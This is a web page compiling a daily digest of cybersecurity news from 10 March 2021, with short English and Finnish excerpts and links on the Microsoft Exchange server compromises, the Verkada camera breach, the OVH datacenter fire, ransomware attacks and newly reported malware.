Daily NCSC-FI news followup 2021-03-10

Introducing sigstore: Easy Code Signing & Verification for Supply Chain Integrity

security.googleblog.com/2021/03/introducing-sigstore-easy-code-signing.html One of the fundamental security issues with open source is that its difficult to know where the software comes from or how it was built, making it susceptible to supply chain attacks. A few recent examples of this include dependency confusion attack and malicious RubyGems package to steal cryptocurrency. Today we welcome the announcement of sigstore, a new project in the Linux Foundation that aims to solve this issue by improving software supply chain integrity and verification.

Warning the World of a Ticking Time Bomb

krebsonsecurity.com/2021/03/warning-the-world-of-a-ticking-time-bomb/ On Mar. 5, KrebsOnSecurity broke the news that at least 30,000 organizations and hundreds of thousands globally had been hacked. The same sources who shared those figures say the victim list has grown considerably since then, with many victims compromised by multiple cybercrime groups. Security experts are now trying to alert and assist these victims before malicious hackers launch what many refer to with a mix of dread and anticipation as Stage 2, when the bad guys revisit all these hacked servers and seed them with ransomware or else additional hacking tools for crawling even deeper into victim networks.

Hackers Breach Thousands of Security Cameras, Exposing Tesla, Jails, Hospitals

www.bloomberg.com/news/articles/2021-03-09/hackers-expose-tesla-jails-in-breach-of-150-000-security-cams A group of hackers say they breached a massive trove of security-camera data collected by Silicon Valley startup Verkada Inc., gaining access to live feeds of 150,000 surveillance cameras inside hospitals, companies, police departments, prisons and schools. Companies whose footage was exposed include carmaker Tesla Inc. and software provider Cloudflare Inc. In addition, hackers were able to view video from inside womens health clinics, psychiatric hospitals and the offices of Verkada itself.

OVH cloud datacenter destroyed by fire

blog.malwarebytes.com/malwarebytes-news/2021/03/ovh-cloud-datacenter-destroyed-by-fire/ A fire in one of the OVH datacenters has destroyed one datacenter and knocked two others offline. It took 100 firefighters and 43 fire trucks to fight the fire in the five-story building. Even though the fire department was quick to respond, and the fire was brought under control relatively quickly, the impact has been big. In a press statement OVH promised to communicate as transparently as possible on the progress of our analyses and the implementation of solutions.. Also:

www.bleepingcomputer.com/news/technology/ovh-data-center-burns-down-knocking-major-sites-offline/.

www.datacenterdynamics.com/en/news/fire-destroys-ovhclouds-sbg2-data-center-strasbourg/

Ad blocker with miner included

securelist.com/ad-blocker-with-miner-included/101105/ Some time ago, we discovered a number of fake apps delivering a Monero cryptocurrency miner to user computers. They are distributed through malicious websites that may turn up in the victims search results. By the look of it, it appears to be a continuation of the summer campaign covered by our colleagues from Avast. Back then, cybercriminals distributed malware under the guise of the Malwarebytes antivirus installer.

Exchange servers under siege from at least 10 APT groups

www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ ESET Research has found LuckyMouse, Tick, Winnti Group, and Calypso, among others, are likely using the recent Microsoft Exchange vulnerabilities to compromise email servers all around the world. On 2021-03-02, Microsoft released out-of-band patches for Microsoft Exchange Server 2013, 2016 and 2019. These security updates fixed a pre-authentication remote code execution (RCE) vulnerability chain (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) that allows an attacker to take over any reachable Exchange server, without even knowing any valid account credentials. We have already detected webshells on more than 5,000 email servers as of the time of writing, and according to public sources, several important organizations, such as the European Banking Authority, suffered from this attack.

Ryuk ransomware hits 700 Spanish government labor agency offices

www.bleepingcomputer.com/news/security/ryuk-ransomware-hits-700-spanish-government-labor-agency-offices/ The systems of SEPE, the Spanish government agency for labor, were taken down following a ransomware attack that hit more than 700 agency offices across Spain. “Currently, work is being done with the objective of restoring priority services as soon as possible, among which is the portal of the State Public Employment Service and then gradually other services to citizens, companies, benefit and employment offices,” an announcement on the agency’s website reads.

FBI-CISA Joint Advisory on Compromise of Microsoft Exchange Server

us-cert.cisa.gov/ncas/current-activity/2021/03/10/fbi-cisa-joint-advisory-compromise-microsoft-exchange-server CISA and the Federal Bureau of Investigation (FBI) have released a Joint Cybersecurity Advisory (CSA) to address recently disclosed vulnerabilities in Microsoft Exchange Server. CISA and FBI assess that adversaries could exploit these vulnerabilities to compromise networks, steal information, encrypt data for ransom, or even execute a destructive attack.

Norjan suurkäräjät joutui uuden tietomurron kohteeksi Microsoft Exchange -haavoittuvuuksien kautta

www.hs.fi/talous/art-2000007852716.html NORJAN suurkäräjät on joutunut uuden tietomurron kohteeksi. Edellinen isku tehtiin seitsemän kuukautta sitten ja pantiin tuolloin venäläisen Fancy Bear -nimellä tunnetun hakkeriryhmän kontolle. Suurkäräjät kertoo lausunnossaan, ettei uuden murron laajuutta tai tekijöitä vielä tiedetä, mutta sillä ei uskota olevan yhteyttä edelliseen iskuun. Murtautujat ovat käyttäneet hyväkseen Microsoft Exchange -palvelinten haavoittuvuuksia.

Researchers Unveil New Linux Malware Linked to Chinese Hackers

thehackernews.com/2021/03/researchers-unveil-new-linux-malware.html Cybersecurity researchers on Wednesday shed light on a new sophisticated backdoor targeting Linux endpoints and servers that’s believed to be the work of Chinese nation-state actors. Dubbed “RedXOR” by Intezer, the backdoor masquerades as a polkit daemon, with similarities found between the malware and those previously associated with the Winnti Umbrella (or Axiom) threat group such as PWNLNX, XOR.DDOS and Groundhog.

Cyber criminals targeting hospitals are ‘playing with lives’ and must be stopped, report warns

www.zdnet.com/article/cyber-criminals-targeting-hospitals-are-playing-with-lives-and-must-be-stopped-report-warns/ Cyberattacks targeting healthcare are putting patients at unnecessary risk and more must be done to hold the cyber criminals involved to account, warns the CyberPeace Institute, an international body dedicated to protecting the vulnerable in cyberspace. The healthcare industry has been under increased strain over the past year due to the impact of the COVID-19 pandemic, which has prompted some cyber criminals to conduct ransomware campaigns and other cyberattacks.

Supo: Ulkomaiset tiedustelupalvelut käyttävät suomalaisten reitittimiä kybervakoiluun

www.is.fi/digitoday/tietoturva/art-2000007851807.html SUOJELUPOLIISI sanoo, että ulkomaiset tiedustelupalvelut ovat käyttäneet kymmenien suomalaisten yritysten ja yksityishenkilöiden verkkoreitittimiä kybervakoiluun. Reitittimien ja muiden verkkoon kytkettyjen laitteiden asetukset kannattaa tarkistaa, supo kehottaa. Supo on jo ollut yhteydessä osaan niistä yrityksistä ja henkilöistä, joiden laitteille on murtauduttu. Supon mukaan tekijät ovat käyttäneet laitteita vain välineinä päästäkseen varsinaiseen vakoilun kohteeseen eikä laitteiden sisältämän tiedon hankkiminen ole ollut heidän tavoitteenaan.. Myös:

www.tivi.fi/uutiset/tv/9cf376bc-e5bf-49c7-8b97-e0661b8e9389. Tiedote:

supo.fi/-/ulkomaiset-tiedustelupalvelut-kayttavat-yritysten-ja-yksityishenkiloiden-verkkoreitittimia-kybervakoiluun

Windowsin oletusselaimissa vakava haavoittuvuus päivitä heti

www.tivi.fi/uutiset/tv/61267ef1-7e3d-4ec9-ba30-f37f32df14cb Kyberturvallisuuskeskus tiedottaa Internet Explorer- ja Edge – -selaimista löytyneestä haavoittuvuudesta, joka voi johtaa muistikorruptioon. Selaimet ovat Windows-käyttöjärjestelmän oletusselaimia. Haavoittuvuuden avulla hyökkääjät voivat suorittaa mielivaltaisia komentoja käyttäjän koneella ja hankkia luottamuksellista tietoa. Microsoft julkaisi maaliskuun 2021 päivityskoosteessa Edge- ja Internet Explorer -selaimiin (versiot 9 ja 11) korjaavia päivityksiä, joilla haavoittuvuus korjataan.. Also:

arstechnica.com/gadgets/2021/03/microsoft-patches-critical-0day-that-north-korea-used-to-target-researchers/

Guidance on Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise

us-cert.cisa.gov/ncas/current-activity/2021/03/09/guidance-remediating-networks-affected-solarwinds-and-active Since December 2020, CISA has been responding to a significant cybersecurity incident involving an advanced persistent threat (APT) actor targeting networks of multiple U.S. government agencies, critical infrastructure entities, and private sector organizations. The APT actor added malicious code to multiple versions of the SolarWinds Orion platform and leveraged itas well as other techniques, includingfor initial access to enterprise networks. After gaining persistent, invasive access to select organizations enterprise networks, the APT actor targeted their federated identity solutions and their Active Directory/M365 environments.

Cyberattackers Exploiting Critical WordPress Plugin Bug

threatpost.com/cyberattackers-exploiting-critical-wordpress-plugin-bug/164663/ The security hole in the Plus Addons for Elementor plugin was used in active zero-day attacks prior to a patch being issued. The Plus Addons for Elementor plugin for WordPress has a critical security vulnerability that attackers can exploit to quickly, easily and remotely take over a website. First reported as a zero-day bug, researchers said its being actively attacked in the wild. The plugin, which has more than 30,000 active installations according to its developer, allows site owners to create various user-facing widgets for their websites, including user logins and registration forms that can be added to an Elementor page. Elementor is a site-building tool for WordPress.

Analyzing Attacks Against Microsoft Exchange Server With China Chopper Webshells

unit42.paloaltonetworks.com/china-chopper-webshell/ Microsoft recently released patches for a number of zero-day Microsoft Exchange Server vulnerabilities that are actively being exploited in the wild by HAFNIUM, a suspected state-sponsored group operating out of China. We provide an overview of the China Chopper webshell, a backdoor which has been observed being dropped in these attacks. We also analyze incidental artifacts, such as metadata, created by the attacks themselves, which allow us to collect information and better understand the nature and methodology of the attackers.

WE OFTEN HEAR about cyberattacks, cyber operations, and malware infections that target computer systems or smartphones. Attacks against civilian infrastructure facilities such as hospitals, water sanitation systems, and the energy sector similarly get a lot of airtime

www.wired.com/story/dire-possibility-cyberattacks-weapons-systems/ But there is another type of high stakes system that gets much less attention: weapons systems. These include guided missiles, missile, and anti-missile systems, tanks, fighter jets, and moreall of which are computerized and possibly networked. We can imagine that weapons systems contain security vulnerabilities similar to most other information systems, including serious ones.

You might be interested in …

Daily NCSC-FI news followup 2020-11-22

Manchester United Shuts Down Systems To Fend Off A Sophisticated Cyber Attack www.forbes.com/sites/leemathews/2020/11/21/manchester-united-shuts-down-systems-to-fend-off-a-sophisticated-cyber-attack/?sh=2759d59b4b60 Its not often that you find cybersecurity headlines on sports websites, but you will this weekend. Manchester United, the third most valuable soccer team in the world, announced yesterday that its network had been breached by hackers.

Read More

Daily NCSC-FI news followup 2021-02-16

France Ties Russia’s Sandworm to a Multiyear Hacking Spree www.wired.com/story/sandworm-centreon-russia-hack/ A French security agency warns that the destructively minded group has exploited an IT monitoring tool from Centreon.. Centreon writes in its statement that “this is not a supply chain type attack and no parallel with other attacks of this type can be made in […]

Read More

Daily NCSC-FI news followup 2021-05-10

DDoS attacks in Q1 2021 securelist.com/ddos-attacks-in-q1-2021/102166/ Q1 2021 saw the appearance of two new botnets. News broke in January of the FreakOut malware, which attacks Linux devices. Cybercriminals exploited several critical vulnerabilities in programs installed on victim devices, including the newly discovered CVE-2021-3007. Botnet operators use infected devices to carry out DDoS attacks or mine […]

Read More

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.